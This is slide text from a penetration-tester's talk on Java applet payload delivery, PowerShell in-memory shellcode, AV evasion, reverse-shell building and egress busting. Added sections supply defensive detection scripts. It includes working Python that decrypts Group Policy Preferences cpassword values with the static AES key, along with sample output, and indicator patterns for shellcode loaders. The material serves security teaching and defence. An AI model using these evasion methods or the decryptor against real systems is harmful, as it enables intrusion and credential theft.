Dave Kennedy
Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
@TrustedSec

Introduction
As penetration testers, exploit writers, huggers, etc., we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.
The purpose of today's talk is to show you my secrets: some of the techniques I use that aren't widely known. Why show you? I'm an open book on everything I do, and sharing is what it's all about.

Technique #1
Java Applet Attack (SET)
Well known attack method, right? Do you know how it actually works? Do you know the techniques behind it that make it successful?

News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How did people find out it was SET?

DEMO: Walking through the Attack

Explaining the Applet
Parameters that are injected into the HTML code are pulled from the Applet. They are obfuscated and randomized each time. The parameters tell the Applet which attacks to use.

Method 1 - Binary Dropper
The binary is downloaded from the attacker machine via a web server (Java downloader). The binary is obfuscated each time per deployment: a combination of PE manipulation, UPX, and rewriting the binary on the fly (import pefile).

DEMO: Binary Dropping Technique

Method 1 - Weak Sauce
Binaries are easily picked up by AV if signatures focus on obfuscation techniques (SET changes them each version). Direct interaction with the Windows file system and writing to disk. Multiple points of evidence on the victim machine.

Method 2 - Shellcodeexec
The Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. The executable takes an int main(int argc, char *argv[]) parameter for alphanumeric shellcode. It uses VirtualAlloc for read, write, and execute memory space. The alphanumeric shellcode is executed in memory and the payload is delivered.

DEMO: ShellcodeExec

Method 2 - Easily Detectable
Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Like Method 1, binaries can be picked up unless a custom version is created. Direct interaction with the Windows file system and writing to disk. Like Method 1, multiple points of evidence on the victim machine.

Method 3 - Powershell Injection
Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). Powershell gives us complete flexibility in a number of post exploitation situations. Technique discovered by Matthew Graeber (you rock).

Method 3 - PS ShellCode Injection
The Applet detects if powershell is installed on the system. It grabs the operating system type (x86 / x64) and deploys shellcode straight through powershell.

DEMO: ShellcodeExec

Method 3 - Powershell Injection
Never touches disk, so AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely difficult. Extremely reliable and stable.

PE Security Evasion

Scenario 1 - Dropping EXE's like it's hot
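The defender's counterpart to Method 3 is not a file signature (there is no file) but what PowerShell itself records: since PowerShell 5, script block logging (event 4104) captures the script text that runs, and an in-memory shellcode runner has to reach a handful of Win32 calls from that text. The triage below is an added example written for this page, not code from the talk or from SET. The indicator names, the log shape and the sample events are constructed assumptions; the ws03 entry is an abbreviated loader with its body elided, enough to exercise the matching but not a working program.

```python
import re

# Indicator patterns. Assumption: a PowerShell shellcode runner that never touches
# disk has to reach Win32 through Add-Type/P-Invoke (DllImport), get executable
# memory (VirtualAlloc), copy bytes into it (Marshal::Copy) and start a thread
# (CreateThread), usually fed from a base64 blob. The names are ours, not a product's.
INDICATORS = {
    "encoded_command": re.compile(r"(?<!\w)-(?:e|enc|encodedcommand)\b", re.I),
    "base64_decode":   re.compile(r"FromBase64String", re.I),
    "pinvoke":         re.compile(r"DllImport", re.I),
    "exec_memory":     re.compile(r"\bVirtualAlloc(?:Ex)?\b", re.I),
    "new_thread":      re.compile(r"\bCreate(?:Remote)?Thread\b", re.I),
    "copy_to_memory":  re.compile(r"Marshal\]::Copy", re.I),
}

# Constructed sample script-block texts (the kind of text event 4104 records).
# ws03 is an abbreviated loader with the body elided ("..."); it is not runnable.
SAMPLE_EVENTS = [
    {"host": "ws01", "script": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"},
    {"host": "ws02", "script": "Add-Type -AssemblyName System.Windows.Forms; "
                               "[System.Windows.Forms.MessageBox]::Show('Done')"},
    {"host": "ws03", "script": "Add-Type -MemberDefinition '[DllImport(\"kernel32.dll\")] ... "
                               "VirtualAlloc ... CreateThread ...' -Name W -Namespace K; "
                               "$sc = [Convert]::FromBase64String($b); "
                               "[System.Runtime.InteropServices.Marshal]::Copy($sc, 0, $mem, $sc.Length)"},
    {"host": "ws04", "script": "powershell.exe -NoP -W Hidden -EncodedCommand BASE64-PLACEHOLDER"},
]


def match_indicators(script_text):
    """Return the set of indicator names that fire on one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_text)}


def triage(events, min_hits=2):
    """Return [(host, sorted indicators)] for events with at least min_hits indicators.

    The default of 2 keeps a lone Add-Type/DllImport or a lone -EncodedCommand
    (both common in legitimate admin tooling) from paging anyone on its own."""
    flagged = []
    for ev in events:
        found = match_indicators(ev["script"])
        if len(found) >= min_hits:
            flagged.append((ev["host"], sorted(found)))
    return flagged


if __name__ == "__main__":
    for host, found in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(found)}")
```

Run against the samples, only ws03 fires; ws04 (an encoded command with nothing else) is reported only when the threshold is lowered to 1, which is the tuning knob an analyst would adjust per environment. Because the talk stresses that the applet obfuscates the PowerShell each time, the matching keys on the API names the runner cannot avoid rather than on any fixed script text.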
You're using Metasploit and all of your payloads are being picked up by AV, HIPS, etc. In most cases, I will rewrite the exe template for Metasploit to customize the binary for evasion. A couple of cool ways to do this.

Modifying EXE for Evasion in MSF
Easiest way for me is to make a simple program that creates a RWX process, then have the program execute Metasploit shellcode.
You can also modify the Metasploit exe.rb template and obfuscate the code that way.

EXE Crypters
One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net). It encrypts the PE file using a randomized simple cipher key with AES 128. When the executable is run, it brute forces the AES key, then decrypts the PE file for you.

DEMO: Hyperion

Hyperion Encryption
Very cool concept and easy to use and write one for yourself. Ability to have a completely unique PE file each time. Slight downfall: the stub used for brute force is not polymorphic.

Building a Simple Reverse Shell

The Reverse Shell
Connects out to the attacker (reverse shell).

Compiling Binaries
PyInstaller compiles Python code for you into a binary by wrapping the Python interpreter into the executable. Works on Linux, OSX, and Windows.

python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist
Making it easy - pybuild.py
All code and samples will be released on the TrustedSec website soon.

DEMO: Building a Shell

Bypassing AV

Finding your way home

Bumping the Firewall
A number of companies restrict ports outbound and only allow what's needed for the business. Trouble getting payloads out, especially if you only have one shot.

Egress Busting
A few ways to do it: a pre-staged payload for identifying a way out, or attempt a staged reverse on every port. Metasploit has an ALLPORTS payload as well.

Egress Buster 0.2
Server/client situation where the victim connects out on every port, 1024 ports at a time. The server listens for connections and reports back. Here's where you can have some fun.

Egress Buster Reverse Shell
Released this week! Allows you to bust all ports inside the firewall and spawn a command shell. Custom, so no AV picks this up. Byte compiled into an executable.

DEMO:

Recent Penetration Test
Found file upload + execute binaries. Could not find a standard port out, i.e. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed.

Fun with Group Policy

One of my PERSONAL favorites
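An egress buster that walks 1024 ports at a time leaves a very distinctive trace on the firewall: one internal host, many distinct destination ports, a short time span, and (as in the pentest above) one or two obscure ports that were allowed. The detection below is an added example for this page, not part of the talk or of Egress Buster. The log line format, field names and sample hosts are constructed assumptions; map your own firewall's fields onto them.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (assumption; adapt the regex to your firewall's export):
# <ISO timestamp> src=<ip> dst=<ip> dport=<port> action=<allow|deny>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) action=(?P<action>allow|deny)$"
)


def parse_lines(lines):
    """Yield parsed events, silently skipping lines that do not match the format."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield {
                "ts": datetime.fromisoformat(m["ts"]),
                "src": m["src"],
                "dport": int(m["dport"]),
                "action": m["action"],
            }


def detect_egress_sweeps(lines, window=timedelta(seconds=60), min_ports=20):
    """Flag sources that try at least min_ports distinct outbound ports inside one
    sliding time window, and list the ports the firewall actually let through
    (those are the holes to close)."""
    by_src = defaultdict(list)
    for ev in sorted(parse_lines(lines), key=lambda e: e["ts"]):
        by_src[ev["src"]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            # advance the window start so that evs[start:end+1] spans at most `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports_in_window = {e["dport"] for e in evs[start:end + 1]}
            if len(ports_in_window) >= min_ports:
                findings[src] = {
                    "distinct_ports": len({e["dport"] for e in evs}),
                    "allowed_ports": sorted({e["dport"] for e in evs if e["action"] == "allow"}),
                }
                break
    return findings


def build_sample_log():
    """Constructed sample: one host sweeping 30 ports in 30 seconds (one gets out),
    one host probing 25 ports spread over two hours, and one host doing normal web."""
    base = datetime(2012, 9, 21, 10, 0, 0)
    lines = []
    for i in range(30):  # fast sweep from 10.1.5.23; port 1051 is the hole
        port = 1024 + i
        action = "allow" if port == 1051 else "deny"
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} src=10.1.5.23 dst=203.0.113.10 dport={port} action={action}")
    for i in range(25):  # slow probe from 10.1.5.31, one port every five minutes
        lines.append(f"{(base + timedelta(minutes=5 * i)).isoformat()} src=10.1.5.31 dst=203.0.113.10 dport={2000 + i} action=deny")
    for i, port in enumerate((443, 80, 443)):  # ordinary browsing from 10.1.5.40
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} src=10.1.5.40 dst=198.51.100.7 dport={port} action=allow")
    return lines


if __name__ == "__main__":
    for src, info in detect_egress_sweeps(build_sample_log()).items():
        print(f"{src}: {info['distinct_ports']} distinct ports tried, allowed out on {info['allowed_ports']}")
```

The slow probe host is the edge case worth noting: with the default one-minute window it never trips the threshold, so a low-and-slow sweep needs a wider window (or a per-day distinct-port count) to surface, at the cost of more noise from legitimate scanners and update agents.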
How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest.
Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID, then MACHINE\Preferences\Groups. Look for the Groups.xml file.

Contents of File

Static key for AES, anyone?

Python Code

# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
from Crypto.Cipher import AES
from base64 import b64decode

# the static AES-256 key (32 bytes) used for every GPP cpassword value
key = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

def decrypt_cpassword(cpassword):
    # the cpassword attribute is base64 with its trailing '=' padding stripped
    cpassword += "=" * (-len(cpassword) % 4)
    # AES-CBC with an all-zero IV; the plaintext is PKCS#7 padded UTF-16LE
    o = AES.new(key, AES.MODE_CBC, b"\x00" * 16).decrypt(b64decode(cpassword))
    return o[:-o[-1]].decode("utf-16-le")

>>> print(decrypt_cpassword(cpassword))  # cpassword taken from Groups.xml
Local*P4ssword!

Expanding on Groups.xml

More Passwords Stored
The folks over at rewt dance (http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, ScheduledTasks, SQL servers and much more are impacted.

List of Other Affected Areas (from rewt dance)
Services\Services.xml
http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
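Since the key is static, the only real fix is to not have cpassword attributes in SYSVOL at all (Microsoft later removed the ability to set them in MS14-025, but existing files stay until someone deletes them and rotates the credential). The audit below is an added example for this page, not code from the talk, from Sogeti or from rewt dance: it walks a SYSVOL copy, reports every preference item that still carries a cpassword, names the account it belongs to, and deliberately never returns or decrypts the value. The file list combines Groups.xml from the talk with the other item types rewt dance reports; the GPO GUID, the XML samples and the account names are constructed placeholders.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files that can carry a cpassword attribute: Groups.xml from the talk,
# the rest from the rewt dance post and the GPP preference item types.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attributes that name the account a stored password belongs to
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")


def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree and report every element carrying a cpassword attribute.
    The ciphertext itself is deliberately not returned: its presence is the finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed XML: skip it rather than abort the whole audit
            for parent in root.iter():
                for elem in parent:
                    if "cpassword" not in elem.attrib:
                        continue
                    account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
                    findings.append({
                        "file": os.path.relpath(path, sysvol_root).replace(os.sep, "/"),
                        "item": parent.tag,
                        "account": account,
                    })
    return sorted(findings, key=lambda f: (f["file"], f["account"]))


# Constructed, simplified GPP files (real ones carry many more attributes).
# The GPO GUID and the cpassword values are placeholders, not real data.
SAMPLE_FILES = {
    "contoso.local/Policies/{PLACEHOLDER-GPO-GUID}/MACHINE/Preferences/Groups/Groups.xml":
        '<Groups><User name="LocalAdmin">'
        '<Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER-CIPHERTEXT-1"/>'
        '</User></Groups>',
    "contoso.local/Policies/{PLACEHOLDER-GPO-GUID}/MACHINE/Preferences/Services/Services.xml":
        '<NTServices><NTService name="BackupAgent">'
        '<Properties accountName="CONTOSO\\svc_backup" cpassword="PLACEHOLDER-CIPHERTEXT-2"/>'
        '</NTService></NTServices>',
    "contoso.local/Policies/{PLACEHOLDER-GPO-GUID}/MACHINE/Preferences/ScheduledTasks/ScheduledTasks.xml":
        '<ScheduledTasks><Task name="Cleanup">'
        '<Properties runAs="SYSTEM"/>'  # no stored password: must not be reported
        '</Task></ScheduledTasks>',
}


def run_demo():
    """Write the samples into a temporary SYSVOL-like tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, xml in SAMPLE_FILES.items():
            path = os.path.join(tmp, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(xml)
        return find_cpasswords(tmp)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['file']}: {f['item']} for account {f['account']} stores a cpassword")
```

Point find_cpasswords at a mounted \\dc\SYSVOL path to run it for real; any hit means the password in that file has to be treated as known to every domain user, so the finding is "rotate and remove", not "decrypt and check".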
Hopefully I can make these a series.

Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques
Shhh...

Dave Kennedy
Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
TrustedSec, LLC
@TrustedSec